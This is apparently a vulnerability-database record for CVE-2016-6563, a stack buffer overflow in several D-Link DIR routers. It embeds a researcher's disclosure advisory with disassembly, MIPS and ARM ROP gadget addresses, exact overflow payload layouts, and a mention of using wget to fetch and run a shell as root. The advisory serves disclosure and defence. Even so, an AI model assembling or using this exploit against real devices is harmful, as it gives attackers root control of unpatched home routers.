The easiest attack to perform is a return-to-libc to execute a command with system(). To do this, R0 must point to the stack location where the command is before system() is called. All the affected ARM devices seem to use the same version of uClibc (libuClibc-0.9.32.1.so) for all firmware versions, which makes gadget hunting much easier and allows building an exploit that works on all the devices without any modification.
first_gadget (pops system() address into r3, and second_gadget into PC): .text:00018298 LDMFD SP!, {R3,PC}
second_gadget (puts the stack pointer into r0 and calls system() at r3): .text:00040CB8 MOV R0, SP .text:00040CBC BLX R3
system() (Executes argument in r0 (our stack pointer) .text:0005A270 system
The final Action / Username / LoginPassword / Catpcha XML parameter value will be: 'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command
a / b = filler 0xffffffff = integer n (see below) AAAA = R11 first_gadget = initial PC payload = stack points here after execution of our ROP chain; it should point to whatever we want system() to execute
When the overflow happens, the stack var "n" is overwritten, which is used to calculate a memory address (see 0x18F58). In order not to crash the process before the shellcode is executed, the variable needs to be set to a numeric value that can be used to calculate a valid memory address. A good value to choose is 0xffffffff, as this will just subtract 1 from the calculated memory address and prevent an invalid memory access.
From this point onwards, it's possible to execute any command in "payload". For example, wget can be used to download a shell and execute it or a telnet server can be started. All commands will be executed as root.
Fix: Dlink did not respond to my or CERT's request for information, so no firmware fix is available at the time of writing. Given that this vulnerability can only be exploited in the LAN, it is recommended to have a strong wireless password to prevent untrusted clients from connecting to the router.
References: [1] https://isc.sans.edu//diary/More+on+HNAP+-+What+is+it,+How+to+Use+it,+How+to+Find+it/17648
[2] https://en.wikipedia.org/wiki/Home_Network_Administration_Protocol [3] http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/ [4] http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/ [5] http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/ [6] https://packetstormsecurity.com/files/134370/D-Link-DIR-818W-Buffer-Overflow-Command-Injection.html [7] https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf [8] http://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection [9] https://github.com/rapid7/metasploit-framework/pull/7543 [10] https://www.kb.cert.org/vuls/id/677427
================ Agile Information Security Limited http://www.agileinfosec.co.uk/
Show details on source websiteEnabling secure digital business >>
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-0057",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-880l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-818l\\",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-822",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-823",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-822",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-859",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-868l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-869",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-879",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-880l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-885l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-890l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-895l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-823",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-822",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-818l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "94130"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-823_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-823:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-822_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-818l\\(w\\)_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-818l\\(w\\):-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-895l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-895l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-890l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-890l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-885l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-885l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-868l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pedro Ribeiro",
"sources": [
{
"db": "BID",
"id": "94130"
},
{
"db": "PACKETSTORM",
"id": "139611"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
}
],
"trust": 1.0
},
"cve": "CVE-2016-6563",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2016-005757",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-95383",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-6563",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2016-005757",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-6563",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "IPA",
"id": "JVNDB-2016-005757",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201611-125",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-95383",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-6563",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L. D-Link Systems, Inc. According to the reporter \u2019s report, HNAP Communication LAN This is done only on the side interface. CWE-121: Stack-based Buffer Overflow https://cwe.mitre.org/data/definitions/121.htmlOf the product LAN A third party who can access the side interface may execute arbitrary code with administrator privileges. \nAn attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. D-Link DIR-823, etc. are all wireless router products of D-Link. tl;dr\n\nA stack bof in several Dlink routers, which can be exploited by an\nunauthenticated attacker in the LAN. There is no patch as Dlink did not\nrespond to CERT\u0027s requests. As usual, a Metasploit module is in the\nqueue (see [9] below) and should hopefully be integrated soon. \n\nThe interesting thing about this vulnerability is that it affects both\nARM and MIPS devices, so exploitation is slightly different for each type. \n\nLink to CERT\u0027s advisory:\nhttps://www.kb.cert.org/vuls/id/677427\n\nLink to a copy of the advisory pasted below:\nhttps://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt\n\nHave fun. \n\nRegards,\nPedro\n\n\u003e\u003e Multiple vulnerabilities in Dlink DIR routers HNAP Login function\n(multiple routers affected)\n\u003e\u003e Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information\nSecurity\n==========================================================================\nDisclosure: 07/11/2016 / Last updated: 07/11/2016\n\n\u003e\u003e Background on the affected products:\n\"Smartphones, laptops, tablets, phones, Smart TVs, game consoles and\nmore a all being connected at the same time. Thatas why we created the\nnew AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to\n3.2Gbps, it delivers the necessary ultra-performance to power even the\nmost demanding connected homes, making it the best wireless home router\nfor gaming.\"\n\n\n\u003e\u003e Summary:\nDlink routers expose a protocol called HNAP (Home Network Administration\nProtocol) on the LAN interface. This is a SOAP protocol that allows\nidentification, configuration, and management of network devices. For more information regarding\nHNAP, see [1] and [2]. \n\nDlink has a long history of vulnerabilities in HNAP. Craig Heffner in\nparticular seems to have found a lot of them (see [3], [4], [5], [6],\n[7], [8]). The affected function\ncontains two subsequent stack overflows, which can be exploited by an\nunauthenticated attacker on the LAN. It affects a number of Dlink\nrouters which span the ARM and MIPS architectures. A Metasploit module\nthat exploits this vulnerability for both architectures has been\nreleased [9]. \n\nA special thanks to CERT/CC and Trent Novelly for help with disclosing\nthis vulnerability to the vendor. Please refer to CERT\u0027s advisory for\nmore details [10]. See below\nfor other constraints. \nAffected versions:\n The following MIPS devices have been confirmed to be vulnerable:\n DIR-823\n DIR-822\n DIR-818L(W)\n\n The following ARM devices have been confirmed to be vulnerable:\n DIR-895L\n DIR-890L\n DIR-885L\n DIR-880L\n DIR-868L -\u003e Rev. B and C only\n\n There might be other affected devices which are not listed above. \n\n-----------------------\nVulnerability details and MIPS exploitation\n-----------------------\n\nThe vulnerable function, parse_xml_value (my name, not a symbol), is\ncalled from hnap_main (a symbol in the binary) in /htdocs/cgibin. \nThis function takes 3 arguments: the first is the request object /\nstring, the second is the XML tag name to be parsed inside the request,\nand the third is a pointer to where the value of that tag should be\nreturned. \n\nThe function tries to find the tag name inside the request object and\nthen extracts the tag value, copying it first to a local variable and\nthen to the third argument. This function is called from hnap_main when\nperforming the HNAP Login action to obtain the values of Action,\nUsername, LoginPassword and Catpcha from the SOAP request shown above. \n\nparse_xml_value(char* request, char* XMLtag, char* tag_value)\n(...)\n.text:00412264 xml_tag_value_start = $s2\n.text:00412264 xml_tag_value_end = $s1\n.text:00412264 C30 addu xml_tag_value_start, $v0, $s0\n # s2 now points to \u003cAction\u003e$value\u003c/Action\u003e\n.text:00412268 C30 la $t9, strstr\n.text:0041226C C30 move $a1, xml_tag_value_end # needle\n.text:00412270 C30 jalr $t9 ; strstr\n.text:00412274 C30 move $a0, xml_tag_value_start #\nhaystack\n.text:00412278 C30 lw $gp, 0xC30+var_C20($sp)\n.text:0041227C C30 beqz $v0, loc_4122BC\n.text:00412280 C30 subu xml_tag_value_end, $v0,\nxml_tag_value_start # s1 now holds the ptr to \u003cAction\u003evalue$\u003c/Action\u003e\n.text:00412284 C30 bltz xml_tag_value_end, loc_4122BC\n.text:00412288 C30 addiu $s0, $sp, 0xC30+xml_tag_var\n.text:0041228C C30 la $t9, strncpy\n.text:00412290 C30 move $a2, xml_tag_value_end # n\n.text:00412294 C30 move $a1, xml_tag_value_start # src\n.text:00412298 C30 addu xml_tag_value_end, $s0,\nxml_tag_value_end\n.text:0041229C C30 jalr $t9 ; strncpy # copies all\nchars in \u003cAction\u003e$value$\u003c/Action\u003e to xml_tag_var using strncpy\n.text:004122A0 C30 move $a0, $s0 # dest\n.text:004122A4 C30 move $a0, a2_ptr # a2_ptr is\na stack variable from hnap_main (passed as third argument to\nparse_xml_value)\n.text:004122A8 C30 lw $gp, 0xC30+var_C20($sp)\n.text:004122AC C30 move $a1, $s0 # src\n.text:004122B0 C30 la $t9, strcpy\t# copies\nxml_tag_var into a2_ptr using strcpy\n.text:004122B4 C30 jalr $t9 ; strcpy # the stack\nof the calling function (hnap_main) is thrashed if 2408+ bytes are sent\n.text:004122B8 C30 sb $zero, 0(xml_tag_value_end)\n(...)\n\nThere are two overflows, therefore two choices for exploitation:\n1) The local stack (on parse_xml_value) can be overrun with 3096+ bytes. \nThis overflow occurs even though strncpy is used, because the argument\nto strncpy is simply the strlen of the value inside the XML tag. \n2) Alternatively, it\u0027s possible to overrun the stack of the calling\nfunction (hnap_main), using only 2408+ bytes - this is because strcpy is\nused to copy the xml_tag_var onto the third argument received by\nparse_xml_value, which is a pointer to a stack variable in hnap_main. \n\nExploiting 1) is easier, and the following example will explain how. \n\nAll the affected MIPS devices use the same version of uClibc\n(libuClibc-0.9.30.3.so) and seem to load it at 0x2aabe000, which makes\nexploitation trivial for all firmware versions. It should be noted that\nthe MIPS devices use the RTL8881a CPU, which is based on a Lextra\nRLX5281 core. The Lextra RLX cores are MIPS clones, but they\u0027re bit\ncrippled as they are lacking a few load and store instructions. For this\nreason, some generic shellcodes that work on MIPS might not work on\nthese CPUs (especially when obfuscated). \n\nThe devices also do not have NX, ASLR nor any other modern memory\nprotections, so the shellcode is executed directly on the stack. \nHowever, it\u0027s necessary to use ROP to prepare the stack for execution,\nwhich can be executed with gadgets taken from libuClibc-0.9.30.3.so. \nDue to the way MIPS CPUs work, it\u0027s necessary to flush the CPU cache\nbefore executing the exploit. This can be forced by calling sleep() from\nlibc (refer to\nhttp://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html for\nan explanation on the MIPS CPU caches). \n\nSo the ROP chain and shellcode will look like:\n\nfirst_gadget - execute sleep and call second_gadget\n.text:0004EA1C move $t9, $s0 \u003c- sleep()\n.text:0004EA20 lw $ra, 0x20+var_4($sp) \u003c- second_gadget\n.text:0004EA24 li $a0, 2 \u003c- arg for sleep()\n.text:0004EA28 lw $s0, 0x20+var_8($sp)\n.text:0004EA2C li $a1, 1\n.text:0004EA30 move $a2, $zero\n.text:0004EA34 jr $t9\n.text:0004EA38 addiu $sp, 0x20\n\nsecond_gadget - puts stack pointer in a1:\n.text:0002468C addiu $s1, $sp, 0x58\n.text:00024690 li $s0, 0x44\n.text:00024694 move $a2, $s0\n.text:00024698 move $a1, $s1\n.text:0002469C move $t9, $s4\n.text:000246A0 jalr $t9\n.text:000246A4 move $a0, $s2\n\nthird_gadget - call $a1 (which now has the stack pointer):\n.text:00041F3C move $t9, $a1\n.text:00041F40 move $a1, $a2\n.text:00041F44 addiu $a0, 8\n.text:00041F48 jr $t9\n.text:00041F4C nop\n\nWhen the crash occurs, the stack pointer is at xml_tag_value[3128]. In\norder to have a larger space for the shellcode (3000+ bytes), it\u0027s\npossible to jump back to xml_tag_value[0]. \n prep_shellcode_1 = 23bdf3c8 \t\t# addi\tsp,sp,-3128\n prep_shellcode_2 = 03a0f809 \t\t# jalr\tsp\n branch_delay =\t\t 2084f830 \t # addi\ta0,a0,-2000 (NOP executed as a\nMIPS branch delay slot)\n\nThe final Action / Username / LoginPassword / Catpcha XML parameter\nvalue will be:\nshellcode + \u0027a\u0027 * (3072 - shellcode.size) + sleep() + \u00271\u0027 * 4 + \u00272\u0027 * 4\n+ \u00273\u0027 * 4 + third_gadget + first_gadget + \u0027b\u0027 * 0x1c + second_gadget +\n\u0027c\u0027 * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay\n\n\u0027a\u0027, \u0027b\u0027 and \u0027c\u0027 are just fillers to make up the buffer, while \u00271111\u0027,\n\u00272222\u0027 and \u00273333\u0027 will be the values of s1, s2 and s3 registers (which\nare not interesting for exploitation), and the rest is the ROP chain,\nshellcode and stack preparation routine. The only bad character that\ncannot be sent in the payload is the null byte as this is a str(n)cpy\noverflow. Up to 3350 characters can be sent, as after that it\u0027s hard to\ncontrol the overflow in a reliable way. Note that all of this is to\nexploit the first buffer overflow with strncpy, but the second buffer\noverflow can be exploited in a similar way. \n\nAs explained above, due to the use of a crippled MIPS core, generic\nshellcodes found on the Internet will likely fail. Some very simple ones\nwork, but the best is to craft a reliable one. The simple Metasploit\nbind shell also seems to work pretty reliably if no encoder is used. \n\n-----------------------\nARM exploitation\n-----------------------\n\nThe same two stack overflows affect ARM, but require less bytes to\noverflow the stack. The following snippet is the same part of\nparse_xml_value as shown for MIPS (taken from firmware 2.03b01 for the\nDIR-868 Rev. B):\n.text:00018F34 C30 LDR R1, [R11,#src] ; src\n.text:00018F38 C30 LDR R2, [R11,#n] ; n\n.text:00018F3C C30 SUB R3, R11, #-xml_tag_var\n.text:00018F40 C30 SUB R3, R3, #4\n.text:00018F44 C30 SUB R3, R3, #4\n.text:00018F48 C30 MOV R0, R3 ; dest\n.text:00018F4C C30 BL strncpy ; first overflow occurs here\n(xml_tag_var in parse_xml_stack) with 1024+ characters\n.text:00018F50 C30 MOV R3, #0xFFFFFBEC\n.text:00018F58 C30 LDR R2, [R11,#n]\n.text:00018F5C C30 SUB R1, R11, #-var_4\n.text:00018F60 C30 ADD R2, R1, R2\n.text:00018F64 C30 ADD R3, R2, R3\n.text:00018F68 C30 MOV R2, #0\n.text:00018F6C C30 STRB R2, [R3]\n.text:00018F70 C30 SUB R3, R11, #-xml_tag_var\n.text:00018F74 C30 SUB R3, R3, #4\n.text:00018F78 C30 SUB R3, R3, #4\n.text:00018F7C C30 LDR R0, [R11,#a2_ptr] ; a2_ptr is is a\nstack variable from hnap_main\n.text:00018F80 C30 MOV R1, R3 ; src\n.text:00018F84 C30 BL strcpy ; second overflow occurs here\n\nThe stack size will be smaller for both parse_xml_value and hnap_main\nwhen compared to the MIPS binary. This time again it\u0027s easier to exploit\nthe easier strncpy overflow in parse_xml_value, but only 1024 bytes are\nenough to overflow the stack. As with the MIPS exploit, the only bad\ncharacter is the null byte. \n\nThe affected ARM devices have a non-executable stack (NX) and 32 bit\nASLR. NX can be defeated with ROP, and the 32 bit ASLR is weak - there\nare only 3 bytes that change in the address calculations, which means\nthere are only 4096 possible values. The attack has to be run several\ntimes until the correct base address is hit, but this can usually be\nachieved in less than 1000 attempts. \n\nThe easiest attack to perform is a return-to-libc to execute a command\nwith system(). To do this, R0 must point to the stack location where the\ncommand is before system() is called. All the affected ARM devices seem\nto use the same version of uClibc (libuClibc-0.9.32.1.so) for all\nfirmware versions, which makes gadget hunting much easier and allows\nbuilding an exploit that works on all the devices without any modification. \n\nfirst_gadget (pops system() address into r3, and second_gadget into PC):\n.text:00018298 LDMFD SP!, {R3,PC}\n\nsecond_gadget (puts the stack pointer into r0 and calls system() at r3):\n.text:00040CB8 MOV R0, SP\n.text:00040CBC BLX R3\n\nsystem() (Executes argument in r0 (our stack pointer)\n.text:0005A270 system\n\nThe final Action / Username / LoginPassword / Catpcha XML parameter\nvalue will be:\n\u0027a\u0027 * 1024 + 0xffffffff + \u0027b\u0027 * 16 + \u0027AAAA\u0027 + first_gadget + system() +\nsecond_gadget + command\n\na / b = filler\n0xffffffff = integer n (see below)\nAAAA = R11\nfirst_gadget = initial PC\npayload = stack points here after execution of our ROP chain; it should\npoint to whatever we want system() to execute\n\nWhen the overflow happens, the stack var \"n\" is overwritten, which is\nused to calculate a memory address (see 0x18F58). In order not to crash\nthe process before the shellcode is executed, the variable needs to be\nset to a numeric value that can be used to calculate a valid memory\naddress. A good value to choose is 0xffffffff, as this will just\nsubtract 1 from the calculated memory address and prevent an invalid\nmemory access. \n\nFrom this point onwards, it\u0027s possible to execute any command in\n\"payload\". For example, wget can be used to download a shell and execute\nit or a telnet server can be started. All commands will be executed as root. \n\n\n\u003e\u003e Fix:\nDlink did not respond to my or CERT\u0027s request for information, so no\nfirmware fix is available at the time of writing. \nGiven that this vulnerability can only be exploited 